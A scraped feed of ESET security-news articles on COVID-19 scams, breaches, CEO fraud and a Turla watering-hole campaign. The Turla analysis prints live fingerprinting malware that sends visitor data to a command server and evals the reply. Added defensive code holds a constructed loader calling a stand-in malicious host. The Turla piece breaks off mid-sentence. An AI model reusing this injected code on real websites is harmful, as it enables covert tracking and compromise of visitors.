Beware scams exploiting coronavirus fears

From malware-laden emails to fake donations, these are some of the most common cons you should watch out for amid the public health crisis

We are currently experiencing an unprecedented global event. The outbreak of Coronavirus Disease 2019 (COVID-19) – now officially a pandemic – has caused apprehension globally, ultimately resulting in lockdowns, travel bans, panic buying, and financial market turmoil.

Scammers, too, have taken notice. Emergencies offer golden opportunities for con artists to launch fraudulent campaigns that feed off, and cash in on, the climate of concern. Against the backdrop of a disease that has so far caused more than 4,000 deaths and continues to spread, scammers have wasted no time in playing on people’s fears or evoking feelings of compassion.

Some cybercriminals clearly think that all their Christmases have come at once: an anxious population, vulnerable people at the highest risk, excessive demand for goods no longer in stock, and masses of disinformation sloshing around on social media – all this equates to a massive opportunity to prey on people and attempt to defraud them while they are at their most susceptible.

The scams can take various forms, and the ESET research team has shared a few examples of the despicable tactics seen in use recently.

Malicious news

As a major source of information on the outbreak, the World Health Organization (WHO) is among the most-impersonated authorities in the ongoing scam campaigns. In the example below, fraudsters pretend to offer important information about the virus in an attempt to get potential victims to click on malicious links. Typically, such links can install malware, steal personal information, or attempt to capture login and password credentials.

Figure 1. An email purporting to be from the World Health Organization

The WHO is aware that its brand is being used by scammers, so it provides advice on its website on how it communicates, and provides details of what it will or will not do in official emails. One of the most important points to note reads:

“Make sure the sender has an email address such as ‘[email protected]’. If there is anything other than ‘who.int’ after the ‘@’ symbol, this sender is not from WHO. WHO does not send email from addresses ending in ‘@who.com’, ‘@who.org’ or ‘@who-safety.org’ for example.”

The organization also advises checking the URL of any link in an email: all genuine WHO web content starts with https://www.who.int/ and no other domain is used. If there is any doubt, type the address directly into your browser.

Importantly, the WHO has not randomly started to email people who are not subscribed to a service. Consider navigating to the dedicated WHO site or to the sites of your respective national health care institutions, such as the Center for Disease Control and Prevention (CDC) in the United States or the National Health Service in the United Kingdom.

The real news can also be found on the trusted sources you normally visit to get your daily intake. Links in unsolicited emails do not have unique or breaking news stories.

In another example, the phishing website below is attempting to impersonate the Wall Street Journal (WSJ) and is supposedly reporting the latest COVID-19 news. We have redacted some of the URL for obvious reasons, but notice that it starts with ‘worldstreet’ and the wording on the webpage states ‘world street’.

Nevertheless, some visual consistency with WSJ branding is there in a clear attempt to subtly trick the visitor into thinking that this is the Wall Street Journal. The delivery of advertising on the site is generating revenue for the bad actors, even if no personal details are gleaned from the user.

Figure 2. Hardly the real thing

Exploiting the charitable spirit

Another common type of scam doing the rounds is a tug on the heart strings that attempts to get the recipient to help fund the vaccine for children in China. There is, at the time of writing, no vaccine available and it is not expected to be ready for public use until next year.

Figure 3. The fake charity

The interesting background to this example is that the bad actor has repurposed an existing campaign infrastructure and process with COVID-19 content. In 2019 we published details of a sextortion scam campaign attempting to scare victims in an attempt to extort money from them.

People who receive the coronavirus-themed emails are asked to send bitcoins to the attackers’ wallets. Despite this technique being only effective for a fraction of the users, when done on a global scale it can be financially attractive for the criminals.

Unmasked

In another type of fraud, scammers send spam emails in a bid to dupe the victims into thinking they can order face masks that will keep them safe from the novel coronavirus. What happens instead is that the victims will unwittingly reveal their sensitive personal and financial information to the fraudsters.

Figure 4. Fake offers for face masks

As you would expect, Google Trends shows that search volumes for terms such as ‘hand sanitizer’ and ‘face masks’ are reaching unprecedented levels. With demand for these products outstripping supply, con artists have been increasingly targeting people who are looking to take protective measures. According to Sky News, fraudulent face mask sellers swindled people in the UK out of £800,000 (US$1 million) in February alone.

Face masks are in very limited supply, so be savvy about product claims and only purchase from a vendor you would normally trust with your order (and credit card details!).

Final thoughts

These are just a few of the examples of how cybercriminals are attempting to capitalize on the current climate surrounding the virus outbreak. This is an apt time for individuals and businesses to learn, or be reminded of, some of the most common ways criminals capitalize on people’s emotions (not only) during major events and emergencies.

Remaining vigilant, identifying and ignoring the product of cybercriminals and cyber-nuisances

Week in security with Tony Anscombe

ESET research into Turla’s new campaign – What is CEO fraud and how to defend against it – How Microsoft enterprise accounts get hacked

ESET researchers document how the Turla APT group has deployed a watering hole operation that compromised several high-profile Armenian websites and foisted two new pieces of malware on carefully chosen targets. In this instalment of our series of articles marking Canada’s Fraud Prevention Month, we look at CEO fraud and how organizations can protect themselves against it. It turns out that more than 99.9 percent of Microsoft enterprise accounts that were compromised by attackers didn’t use multi-factor authentication. All this – and more – on WeLiveSecurity.com.

Radio.com users affected in data breach

An unknown number of people had their personal data exposed as hackers accessed database backup files

Entercom, the second-largest radio company in the United States, has announced that it suffered a cybersecurity incident related to its Radio.com domain. The company has found that in August 2019 an intruder accessed the company’s backup cloud database that contained sensitive user data, including possibly Social Security Numbers (SSNs) and driver’s license numbers. Entercom disclosed the breach by sending emails to the affected users and sharing it with the Office of the Attorney General of the State of California.

After suffering a cyberattack in September 2019, the company requested assistance from external computer forensic specialists to see what data had been compromised.

During the investigation, the team uncovered that an unknown party had accessed a third-party cloud hosting service the company uses to host information provided by their listeners. They zeroed in on a specific three-hour timeframe on August 4th, 2019, during which the hackers accessed a database with backup files containing the personal protected information of Radio.com users.


“Our investigation determined that the impacted database backup files contained, and the unauthorized actor may have accessed, the following types of your personal information: name, Social Security number, and driver’s license number,” said Entercom.

The login credentials of Radio.com users were also compromised. The company kept mum on how many of its users were actually affected, although it did confirm that it was aware of the number. The radio giant gave assurances that it takes the breach seriously and is implementing a wide range of measures to prevent any such breaches in the future:

“We have taken and continue to take steps to prevent this type of incident from happening in the future, including by implementing password rotations, enabling multifactor authentication and stronger password policies for all cloud services, enhancing and broadening auditing based on best practices advised by third party experts, configuring alerts for certain behaviors using the relevant platforms, and providing additional training to staff on data security,” the company said in its statement, adding that it notified regulatory authorities about the breach as well.

Entercom also strongly encouraged its customers to take preventive measures as well such as changing their password for the service. Users who recycle their login details across multiple online accounts should change their passwords for the other services as well.

The company also offered access to 12 months of complimentary credit monitoring and identity theft restoration services at no cost to users.

13 Mar 2020 – 03:18PM

4:15 p.m.: An urgent message from the CEO

What is CEO fraud, why is it so prevalent, and how can organizations recognize and defend themselves against these scams?

A little role-playing. You’re in the office, it’s 4:15 p.m., and you receive a message from your company’s VP of Finance. An urgent transfer of funds is required to finalize an agreement with a major partner, and the transfer must be sent by the end of the day. How do you respond?

In this second article, as part of Fraud Prevention Month (#FPM2020) we look at a very specific type of scam, which is growing in popularity at an alarming rate: CEO scams.

What is CEO fraud?

CEO fraud is a form of spearphishing attack that targets members of a company’s finance or accounting team. Whereas a whaling attack targets senior management themselves, in CEO fraud the criminals impersonate executives to convince the email recipients to quickly transfer money for a supposedly critical operation for the organization. The money, however, is transferred to an account under the control of the cybercriminals.

As you read this, you may be thinking that you would never fall for it. After all, you know your superiors well and would easily recognize their email addresses or phone numbers. Yet, the FBI estimates that, between 2016 and 2019, Business Email Compromise (BEC) generated losses of US$26 billion.

The Canadian city of Ottawa was among the victims in 2018. The city treasurer, Marian Simulik, received a scam email and wired over CA$100,000 to fraudsters. A few days later, she received another fraudulent email, asking to wire another CA$150,000. Luckily, Simulik received the second email while in the same room as City Manager Steve Kanellakos, who the fraudsters were impersonating. She asked him if the request was legitimate, which blew the lid off the scam.

In order to convince their targets, scammers use various schemes. As in many scams, criminals use social engineering. They evoke a sense of urgency in their target in order to incite the employee to act quickly and ask as few questions as possible. In addition, taking the identity of an executive to address a specific employee with an essential and urgent request can generate a sense of pride. Who wants to take the risk of disappointing an executive who trusts us?

Criminals also work upstream to steal the required identity. Finding the names of the company’s senior executives usually requires only a simple online search, probably on the company’s own website. Name theft thus adds credibility to their attempt.

The next step involves imitating or spoofing the email address. The easy method is to create a fake email address that looks like the legitimate one. For example, [email protected] could become [email protected] (note the missing ‘r’ in ‘your’). They can also use email spoofing, or email address spoofing. In this case, the sender’s address would appear in the message as [email protected]. In both cases, clicking ‘Reply’ would send the email directly to the scammer, rather than the legitimate recipient (or the similar email).

How to protect your organization

The first step an organization can take to protect itself from this type of fraud is a clear and robust financial transaction protocol. For example, requiring the approval of at least two authorized persons for any transfer can be part of the rules. Rules on the types of transfers can also be implemented.

As is usually the case with fraud prevention, awareness training and vigilance are once again your allies. Since this type of fraud targets specific corporate departments, special emphasis should be placed on the members of these teams, particularly with respect to the protocols in place and the means of detecting these scams. The basic measures for recognizing phishing attempts remain just as valid here: not succumbing to pressure and a sense of urgency, and carefully checking details such as names, source addresses and signatures.

Inviting employees not to reply directly to a suspicious e-mail, but rather to contact the purported sender by phone – using the official number, rather than the one in the message signature – can also prevent damage. In the above example, a quick phone call from her associates would let Ms. Brown confirm that the message was an attempt to defraud and not a request on her part.

Whether it’s 9:10 a.m. or 4:15 p.m., there are no bad times to remind the entire team of fraud prevention measures; and there are no bad times to implement them. As the saying goes, “an ounce of prevention is worth a pound of cure.”

As a continuation of our Fraud Prevention Month special series, our next two weekly articles will focus on one of the most popular tactics used by scammers: social engineering.

In the meantime, we encourage you to read our interview with ESET Chief Security Evangelist Tony Anscombe, who spoke about what people and businesses can do to avoid falling prey to various types of online fraud.

13 Mar 2020 – 02:00PM

The pitfalls of being an influencer: What parents should know and do

Does your child dream of becoming a YouTube or Instagram celebrity? The influencer lifestyle is not as picture-perfect as it may seem.

The rise of the internet has led to the rise of the social media influencer, altering the aspirations of children around the world. A recent survey of 2,000 parents of 11 to 16-year-olds shows that doctors (18%) are still number one on the dream job list, but they are closely followed by social media influencers (17%) and, more specifically, YouTubers (14%).

Being an online celebrity might look glamorous, but what are the risks? The digital world can hide a range of dangers, and it’s important that both children and their parents are aware of the threats.

Online hate is inevitable

Many young influencers, who base their self-worth on the likes and shares they receive, struggle if the interest of the online crowd fades. Basing self-esteem on public acknowledgement from strangers at an early age is risky – this is especially true considering that feedback on the internet can often be even more aggressive as anonymity is heightened and the commentator can hide behind their screen.

Any person in the social media limelight will inevitably have to face online hate. Comment sections flooded with hateful messages are an emotional drag while actual threats are frightening for anyone, no matter their age.

Parents can help their children by moderating comments and reporting inappropriate behavior to administrators, but this is not feasible when large numbers of people are involved.

Oversharing and online stalking

Kim Kardashian is one of the most influential figures on social media – someone who likes to post and share everything from her private life. During one of her visits to Paris this backfired in the worst possible way when she was robbed at gun point, with criminals stealing jewelry worth US$8 million. It later came to light that the heist was organized based simply on following Kim’s whereabouts on social media posts. This example of oversharing should be a warning to anyone, especially to young influencers who will do almost anything to please their followers.

Parental guidance at the start of a child’s digital life is essential. It helps set healthy boundaries between public and private life on social media. Remember – anything posted online will stay there forever.

Followers are not real friends

Nowadays we spend so much time in the digital world that we often feel like it’s the real world, and so young children tend to overlook the simple fact that followers are not real friends. Anonymous online crowds will not be there when they need a break from the latest social media craze or be their confidant in difficult times. Real friends and family cannot be replaced and should not be neglected in favor of a digital life.

What else can a parent do to keep their children safe?

Talk to your children and guide them through their experience online from a young age. If they pick up good habits when they’re young, there is a good chance they’ll adhere to them as teenagers.
Keep the dialogue as open as possible. Make sure your child sees you as a trusted advisor in case anything in their online life goes wrong.
If your young children follow an influencer, consider following the online celebrity too and keep an eye on what they share or post. Be there to discuss with your child any inappropriate content that appears.
Build bridges across the generation gap. When having a conversation with your child, listening can be more valuable than talking. Let your child know you’re interested in what they’re saying and lead by example – practice what you preach.
Accept your child’s ambition to be an acknowledged content creator as an opportunity to be close to them and teach them more than just how to prepare their online stream. Keep yourself up to date with the latest trends amongst teens.
You have responsibilities, but try not to act like an authoritarian figure. Make it clear that both of you are learning. That way you can enjoy a dialogue with your teenager at an age where communication can be particularly difficult.
Use parental control tools that can help you keep an eye on what your children are doing online and identify situations where they might need advice.
With your support they can learn how to act responsibly and articulate their opinion, how to set good goals and achieve them. This last point is especially important nowadays when most teens have expectations of instant results.

To learn more about the dangers faced by children online, as well as about how technology and more can help, head over to the Safer Kids Online platform.

13 Mar 2020 – 11:30AM

European power grid organization hit by cyberattack

The incident affected our office network, says ENTSO-E, as it implements measures to avoid future cyber-incursions

The European Network of Transmission System Operators for Electricity (ENTSO-E) has admitted that it fell victim to a cyberattack recently. In a brief statement published on its website, the organization says that it has found evidence of a “successful cyber intrusion” that affected its office network.

ENTSO-E, which represents 42 electricity Transmission System Operators (TSOs) across Europe, emphasized that the compromised systems are not connected to any operational transmission network. The organization also said that it has duly informed its members about the security incident, all the while it continues to assess the situation.

“A risk assessment has been performed and contingency plans are now in place to reduce the risk and impact of any further attacks,” added ENTSO-E in its statement.

Speaking to CyberScoop, ENTSO-E spokesperson Claire Camus declined to provide additional comments on the issue, citing “obvious reasons”.

Meanwhile, a number of ENTSO-E members are looking into the incident as well. Erik Nordman, a security manager at Sweden’s TSO Svenska kraftnät, said that the company was inquiring into whether the breach had had any effect on its systems. In order to limit any possible impact, the company was putting extra preventive measures in place.

Statnett, the Norwegian TSO, is also investigating the incident, but so far it has not found any indication that the breach may have affected its own IT systems. Switzerland’s Swissgrid released a statement to much the same effect.

Fingrid, the TSO out of Finland, noted that it might have to delay the launch of its Energy Identification Codes that are needed for trading on the energy markets. The company added that the attack was neither targeted at them nor at any other TSOs, and that customers and stakeholders weren’t affected.

It’s worth noting that attacks targeting critical infrastructure providers have been a major concern in recent years. Ukraine has even suffered two attack-induced blackouts, and ESET researchers have previously analyzed pieces of malware (e.g. BlackEnergy and Industroyer) that were used in attacks against Ukraine’s energy industry, ultimately causing power outages.

12 Mar 2020 – 04:11PM

Tracking Turla: New backdoor delivered via Armenian watering holes

Can an old APT learn new tricks? Turla’s TTPs are largely unchanged, but the group recently added a Python backdoor.

ESET researchers found a watering hole (aka strategic web compromise) operation targeting several high-profile Armenian websites. It relies on a fake Adobe Flash update lure and delivers two previously undocumented pieces of malware we have dubbed NetFlash and PyFlash.

Various aspects of this campaign lead us to attribute this operation to Turla, an infamous espionage group active for more than ten years. Its main targets include governmental and military organizations. We have previously reported multiple campaigns of this group including Mosquito and LightNeuron.

This recent operation bears similarities to several of Turla’s watering hole campaigns that we have tracked in the past years. In particular, the modus operandi is similar to a campaign we uncovered in 2017. The various pieces of JavaScript used there are almost identical to those in this campaign, but the targets and payloads are different.

Targeted websites

In this specific operation, Turla has compromised at least four Armenian websites, including two belonging to the government. Thus, it is likely the targets include government officials and politicians.

According to ESET telemetry, the following websites were compromised:

armconsul[.]ru: The Consular Section of the Embassy of Armenia in Russia
mnp.nkr[.]am: Ministry of Nature Protection and Natural Resources of the Republic of Artsakh
aiisa[.]am: The Armenian Institute of International and Security Affairs
adgf[.]am: The Armenian Deposit Guarantee Fund

We have indications that these websites were compromised since at least the beginning of 2019. We notified the Armenian national CERT and shared our analysis with them before publication.

Turla operators leveraged unknown access methods to these websites to insert a piece of malicious JavaScript code. For example, for mnp.nkr[.]am, they appended obfuscated code at the end of jquery-migrate.min.js (a common JavaScript library), as shown in Figure 1.

Figure 1. Obfuscated JavaScript code injected into the mnp.nkr[.]am website

This code loads an external JavaScript from skategirlchina[.]com/wp-includes/data_from_db_top.php. We analyze this code in the next section.

Since the end of November 2019, we noticed that skategirlchina[.]com was not delivering malicious scripts anymore. Thus, it is likely the Turla operators have suspended this watering hole operation.
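Appending a loader to a library file such as jquery-migrate.min.js leaves the page looking unchanged, so site operators need a check that compares what is served against a known-good baseline rather than trusting the CMS. The following is an added example, not ESET's tooling, of such an integrity audit: it keeps a hash and length per asset, reports growth consistent with appended code, lists external hosts that are not on the site's allowlist and flags calls a minified library has no reason to make. The library stub, the appended snippet, the allowlist and the host loader.malicious.example are all constructed.

```python
import hashlib
import re

# Hosts the site legitimately loads scripts from (hypothetical allowlist).
ALLOWED_HOSTS = {"www.example-site.am", "cdn.example-site.am"}

# Calls a minified library has no reason to make on the page's behalf; their
# presence in a file whose hash changed is worth a closer look.
SUSPICIOUS_PATTERNS = ("eval(", "evercookie", "document.write(", "new Function(")

# Captures the host of any absolute URL; [.] is allowed so defanged IoCs match.
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-\[\]]+)", re.IGNORECASE)

# Constructed stand-ins for a clean library file and the same file with a
# script loader appended after it, in the manner described for mnp.nkr[.]am.
CLEAN_JS = "/*! jquery-migrate (constructed stub) */!function(a){a.migrateVersion='1.4.1'}(jQuery);"
TAMPERED_JS = CLEAN_JS + (
    ';(function(){var s=document.createElement("script");'
    's.src="http://loader.malicious.example/stage2.js";'
    'document.head.appendChild(s);})();'
)


def sha256_hex(content: str) -> str:
    return hashlib.sha256(content.encode("utf-8")).hexdigest()


# Baseline recorded when the site was last known-good: hash and length per asset.
BASELINE = {
    "jquery-migrate.min.js": {"sha256": sha256_hex(CLEAN_JS), "length": len(CLEAN_JS)},
}


def external_hosts(js: str) -> set:
    """Hosts referenced by absolute URLs anywhere in the script text."""
    return {h.lower() for h in HOST_RE.findall(js)}


def audit_asset(name: str, content: str, baseline: dict = BASELINE,
                allowed_hosts: set = ALLOWED_HOSTS) -> dict:
    """Compare a served script with its baseline and report what changed."""
    expected = baseline.get(name)
    modified = expected is None or sha256_hex(content) != expected["sha256"]
    grew_by = len(content) - expected["length"] if expected else None
    unexpected = {h for h in external_hosts(content) if h not in allowed_hosts}
    flagged = [p for p in SUSPICIOUS_PATTERNS if p in content]
    return {
        "asset": name,
        "modified": modified,
        "grew_by": grew_by,  # positive growth is consistent with appended code
        "unexpected_hosts": sorted(unexpected),
        "suspicious_patterns": flagged,
        "alert": modified and (bool(unexpected) or bool(flagged) or (grew_by or 0) > 0),
    }


if __name__ == "__main__":
    print(audit_asset("jquery-migrate.min.js", CLEAN_JS))
    print(audit_asset("jquery-migrate.min.js", TAMPERED_JS))
```

Run from a host outside the web server's trust boundary (fetching assets the way a visitor would), a changed hash is the primary signal; the host and pattern lists only help prioritise what to read first.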

Fingerprinting and malware delivery

Upon visiting a compromised webpage, the second-stage malicious JavaScript is delivered by skategirlchina[.]com and fingerprints the visitor’s browser. Figure 2 shows the main function of this script.

If it is the first time the user’s browser executes the script, it will add an evercookie with a seemingly random MD5 value provided by the server, different at each execution of the script. The implementation of the evercookie is based on code available on GitHub. It uses multiple storage places such as the local database, local shared objects (Flash cookies), Silverlight storage, etc., to store the cookie value. In comparison to a regular cookie, it will be much more persistent as it won’t be deleted if the user just deletes the browser’s cookies.

This evercookie will be used to track whether the user visits one of the compromised websites again. When the user comes back for a second time, the previously stored MD5 value will be used to identify them.

Then, it collects several pieces of information including the browser plugin list, the screen resolution and various operating system information. This is sent to the C&C server in a POST request. If there is a reply, it is assumed to be JavaScript code and is executed using the eval function.

```javascript
[…]
function f_ec(){
    // Evercookie pointed at the second-stage server (URLs defanged)
    var ec = new evercookie({domain:'http://skategirlchina[.]com/wp-includes/data_from_db_top.php',baseurl:'?http://skategirlchina[.]com/wp-includes/data_from_db_top.php'});
    ec.get("ec", function(value) {
        if (value!=undefined){
            // Returning visitor: build the fingerprint around the stored value
            var jsonText = {'ec': ''+value+'',
                            'scp':screen.pixelDepth==undefined?''+0+'':''+screen.pixelDepth+'',
                            'scw':''+screen.width+'',
                            'sch':''+screen.height+'',
                            'bn':''+bn+'',
                            'bv':''+bv+'',
                            'bc':''+bc+'',
                            'osn':''+osn+'',
                            'osv':''+osv+'',
                            'osc':''+osc+'',
                            'adr':''+adr+'',
                            'pdr':''+pdr+'',
                            'fla':''+fla+'',
                            'jav':''+jav+'',
                            'wmp':''+wmp+'',
                            'msw':''+msw+'',
                            'qui':''+qui+'',
                            'sho':''+sho+'',
                            'type':'info',
                            'tiz': ''+(new Date().getTimezoneOffset()/60)+''
                            };
            var json = JSON.stringify(jsonText);
            // POST the fingerprint to the C&C; any reply is executed as JavaScript
            ajax({
                content_type : 'application/json',
                url:  'http://skategirlchina[.]com/wp-includes/data_from_db_top.php?http://skategirlchina[.]com/wp-includes/data_from_db_top.php',
                crossDomain: true,
                type: 'POST',
                data: json,
                onSuccess: function(m){
                    eval(m);
                }
            });
        }
        else{
            // First visit: store the server-supplied value, then retry
            ec.set('ec', '<redacted MD5 value>');
            setTimeout(f_ec,1500);
        }
    });
}
```

Figure 2. Fingerprint script (malicious URLs defanged)

If the visitor is deemed interesting, the server replies with a piece of JavaScript code that creates an iframe. Data from ESET telemetry suggests that, for this campaign, only a very limited number of visitors were considered interesting by Turla’s operators.

This iframe displays a fake Adobe Flash update warning to the user, shown in Figure 3, in order to trick them into downloading a malicious Flash installer.

Figure 3. Fake Adobe Flash update iframe

We did not observe the use of any browser vulnerabilities. The compromise attempt relies only on this social engineering trick. Once the malicious executable is downloaded from the same server as the iframe’s JavaScript, and if the user launches it manually, a Turla malware variant and a legitimate Adobe Flash program are installed.

Figure 4 is an overview of the compromise process from initially visiting one of the compromised Armenian websites to the delivery of a malicious payload.

Figure 4. Overview of the watering hole operation

Malware

Once the user executes the fake installer, it will execute both a Turla malware variant and a legitimate Adobe Flash installer. Thus, the user is likely to believe that the update warning was legitimate.

Before September 2019: Skipper

Prior to the end of August 2019, the victim would receive a RAR-SFX

Flaw in popular VPN service may have exposed customer data

NordVPN praised its bug bounty program and said that a fix had been shipped within two days

NordVPN, one of the most popular virtual private network (VPN) services, has fixed a security flaw that is said to have exposed customers’ email addresses and other information.

The security hole was linked to three payment platforms used by NordVPN – Momo, Gocardless, and Coinpayments. According to The Register, which was the first to report on the issue, the flaw was uncovered by a researcher going by the moniker ‘dakitu’ and was disclosed via popular bug bounty platform HackerOne.

The researcher found that anyone who sent an HTTP POST request without authentication to join.nordvpn.com could see users’ email addresses, payment method and URL, the product they purchased, the amount they paid for it and even the currency used in the transaction.

There is actually some uncertainty as to the severity of the bug, as NordVPN said in a statement today that only a handful of random email addresses – and no other customer data – might have been at risk.

Nevertheless, the vulnerability was uncovered on December 4th, 2019, before being fixed by NordVPN two days later. The flaw and its patch were made public on the website in February and ‘dakitu’ received a bounty reward of US$1,000 for his efforts.

NordVPN didn’t say whether it had notified its customers about the vulnerability or not. At any rate, the company was satisfied with the outcome, stating that this is one of the reasons it launched its bug bounty program and that it hopes to reap more benefits in the future: “We are extremely happy with its results and encourage even more researchers to analyze our product.”

In October of last year, NordVPN was criticized for taking too long to fess up to a security breach that may have lasted from March of 2018. The company argued that the long disclosure period was needed because of the size of its infrastructure audit and the number of servers the company runs to host its service.

10 Mar 2020 – 05:17PM

Microsoft: 99.9 percent of hacked accounts didn’t use MFA

Only 11 percent of all enterprise accounts have multi-factor authentication enabled

More than 99.9 percent of Microsoft enterprise accounts that get invaded by attackers didn’t use multi-factor authentication (MFA). This stark, though not entirely surprising, finding comes from a presentation that Alex Weinert, the tech giant’s Director of Identity Security, delivered at the RSA 2020 security conference in San Francisco in late February. Overall, only 11 percent of Microsoft enterprise accounts had MFA enabled.

According to Microsoft, an average of 0.5 percent of all accounts is breached every month; in January of this year, this was equivalent to more than 1.2 million accounts. “If you have an organization of 10,000 users, 50 of them are going to be compromised this month,” said Weinert.

The break-ins were facilitated by two factors. The first was the absence of MFA in applications using legacy email protocols that don’t support it, such as SMTP, IMAP and POP. The second was poor password hygiene, specifically people’s penchant for extremely simple passwords and for reusing their passwords across multiple accounts, both company and private.


Around 480,000 compromised accounts, some 40 percent of the total, fell victim to password spraying. In this automated attack, a small set of the most commonly used passwords is tried against a large number of accounts in the hope that some of them match.

And work they do, with Weinert noting that password spraying attacks opened the door to 1 percent of the accounts against which they were deployed in January. On average, attackers would try around 15 passwords.

Roughly the same number of accounts fell victim to password replay attacks, also known as breach replay attacks. In these cases, ne’er-do-wells leverage lists of credentials spilled in data incidents and try out the same login combinations at other services.

Almost all password spraying and password replay attacks took aim at common legacy authentication protocols – 99.7 percent and 97 percent, respectively. The probability of a compromise surged to 7.2 percent if SMTP was enabled, to 4.3 percent for IMAP, and to 1.6 percent for POP.
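The signature of password spraying in authentication logs is the inverse of a brute-force attempt: one source, many distinct accounts, only a handful of tries each, very often over a legacy protocol where MFA cannot intervene. The following is an added example, not from Microsoft's presentation, that runs that heuristic over a small constructed log in a made-up format (timestamp, source IP, user, protocol, result) and reports the sources that match, including any account where a try succeeded.

```python
import re
from collections import defaultdict

# Protocols the article names as lacking MFA support.
LEGACY_PROTOCOLS = {"SMTP", "IMAP", "POP", "POP3"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) proto=(?P<proto>\S+) result=(?P<result>\S+)$"
)

# Constructed log: 203.0.113.7 tries one or two passwords against six accounts
# over IMAP (spraying); 198.51.100.5 is one user fumbling a password.
SAMPLE_LOG = """\
2020-01-15T08:00:01Z src=203.0.113.7 user=alice proto=IMAP result=FAIL
2020-01-15T08:00:03Z src=203.0.113.7 user=bob proto=IMAP result=FAIL
2020-01-15T08:00:05Z src=203.0.113.7 user=carol proto=IMAP result=FAIL
2020-01-15T08:00:07Z src=203.0.113.7 user=dave proto=IMAP result=FAIL
2020-01-15T08:00:09Z src=203.0.113.7 user=erin proto=IMAP result=FAIL
2020-01-15T08:00:11Z src=203.0.113.7 user=frank proto=IMAP result=SUCCESS
2020-01-15T08:00:13Z src=203.0.113.7 user=alice proto=IMAP result=FAIL
2020-01-15T08:05:00Z src=198.51.100.5 user=grace proto=HTTPS result=FAIL
2020-01-15T08:05:10Z src=198.51.100.5 user=grace proto=HTTPS result=FAIL
2020-01-15T08:05:20Z src=198.51.100.5 user=grace proto=HTTPS result=FAIL
2020-01-15T08:05:40Z src=198.51.100.5 user=grace proto=HTTPS result=SUCCESS
"""


def parse_line(line: str):
    """Return the fields of one log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_spraying(log_text: str, min_distinct_users: int = 5,
                    max_attempts_per_user: int = 3) -> dict:
    """Sources whose pattern is 'many accounts, few attempts each'."""
    per_src = defaultdict(lambda: {
        "attempts": defaultdict(int), "successes": set(), "protocols": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        entry = per_src[rec["src"]]
        entry["attempts"][rec["user"]] += 1
        entry["protocols"].add(rec["proto"].upper())
        if rec["result"] == "SUCCESS":
            entry["successes"].add(rec["user"])

    flagged = {}
    for src, entry in per_src.items():
        attempts = entry["attempts"]
        # A single user retrying (198.51.100.5 above) fails the distinct-user bar.
        if len(attempts) >= min_distinct_users and max(attempts.values()) <= max_attempts_per_user:
            flagged[src] = {
                "distinct_users": len(attempts),
                "max_attempts_per_user": max(attempts.values()),
                "legacy_protocol": bool(entry["protocols"] & LEGACY_PROTOCOLS),
                "compromised_accounts": sorted(entry["successes"]),
            }
    return flagged


if __name__ == "__main__":
    for src, info in detect_spraying(SAMPLE_LOG).items():
        print(src, info)
```

The thresholds are deliberately conservative and should be tuned to the tenant's size; Weinert's figure of roughly 15 passwords per account means a real campaign stays well under most per-user lockout limits, which is exactly why counting distinct users per source matters more than counting failures per user.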

What are the easiest fixes? You guessed it – choosing strong and unique passphrases, enabling MFA (also commonly known as two-factor authentication), and disabling legacy protocols. According to Microsoft, the latter measure slashes the likelihood of an account takeover by two thirds.

9 Mar 2020 – 07:23PM

Week in security with Tony Anscombe

ESET research into the Guildma banking trojan – What can you do to stay safe from online fraud – Why become a cybersecurity professional

ESET researchers have released their findings on the Guildma banking trojan that targets mainly financial institutions in Brazil and is thought to be the most advanced malware of its kind in Latin America. March is Fraud Prevention Month in Canada, and I shared thoughts with the WLS editorial team on why proactive steps are essential for staying safe from online scams. As the United Kingdom marks National Careers Week, we also looked at some of the reasons why you should consider a career in cybersecurity. All this – and more – on WeLiveSecurity.com.